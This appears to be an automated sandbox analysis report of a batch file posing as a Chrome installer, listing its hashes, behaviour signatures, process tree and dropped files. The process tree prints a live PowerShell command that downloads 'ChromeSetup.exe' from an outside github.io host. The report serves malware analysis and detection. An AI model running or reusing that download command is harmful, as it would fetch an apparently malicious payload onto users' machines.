Analysis

  • max time kernel
    95s
  • max time network
    99s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20-11-2024 06:22

General

  • Target

    Files/Apps/chrome.bat

  • Size

    402B

  • MD5

    d776640ad800949d98208ec997899b77

  • SHA1

    693b1050f6458c679fdb821e6ced8a79d5640143

  • SHA256

    8a3fb07e6e9765bf8c6b40c7cea663a4cf65ccf1d7519fac88e5e7ec5bf4613a

  • SHA512

    3c75486e8e3f6a46313d9c7b9c4791a73c09b0d138dabadc11f0767232927a89242682753736cc4ce22685530dddc241985f79a7dbfb34bbfa8f5d51a5ccf0c8

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Files\Apps\chrome.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1452
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ver
      2⤵
        PID:2820
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c chcp
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:5012
        • C:\Windows\system32\chcp.com
          chcp
          3⤵
            PID:4916
        • C:\Windows\system32\chcp.com
          chcp 65001
          2⤵
            PID:1632
          • C:\Windows\system32\chcp.com
            chcp 437
            2⤵
              PID:412
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command "iwr -useb 'https://schooicodes.github.io/file_hosting/ChromeSetup.exe'"
              2⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2596

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\ChromeSetup.exe

            Filesize

            670B

            MD5

            ffe11e6c1c9935c5c29c1150be6a723b

            SHA1

            6bc82c442f127bdb1d24f6a03958011088bd75a8

            SHA256

            a3d32dbbd41013a14348ec32ef61430a0752de957afd2e9f111cca70b9744fe2

            SHA512

            85f1c20455123e3e2d3c00d5cee0919a1f2017c3ebc1ef6193e97e94239af1b77757b8177ad6f41ac588df07b172c02545b03c1f6242de53fe2bd6788e9bd7d5

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ihp2ylnt.jef.ps1

            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • memory/2596-0-0x00007FFD36103000-0x00007FFD36105000-memory.dmp

            Filesize

            8KB

          • memory/2596-6-0x000001DB9FD30000-0x000001DB9FD52000-memory.dmp

            Filesize

            136KB

          • memory/2596-11-0x00007FFD36100000-0x00007FFD36BC1000-memory.dmp

            Filesize

            10.8MB

          • memory/2596-12-0x00007FFD36100000-0x00007FFD36BC1000-memory.dmp

            Filesize

            10.8MB

          • memory/2596-13-0x00007FFD36103000-0x00007FFD36105000-memory.dmp

            Filesize

            8KB

          • memory/2596-14-0x00007FFD36100000-0x00007FFD36BC1000-memory.dmp

            Filesize

            10.8MB

          • memory/2596-15-0x00007FFD36100000-0x00007FFD36BC1000-memory.dmp

            Filesize

            10.8MB

          • memory/2596-19-0x00007FFD36100000-0x00007FFD36BC1000-memory.dmp

            Filesize

            10.8MB

          • memory/2596-20-0x00007FFD36100000-0x00007FFD36BC1000-memory.dmp

            Filesize

            10.8MB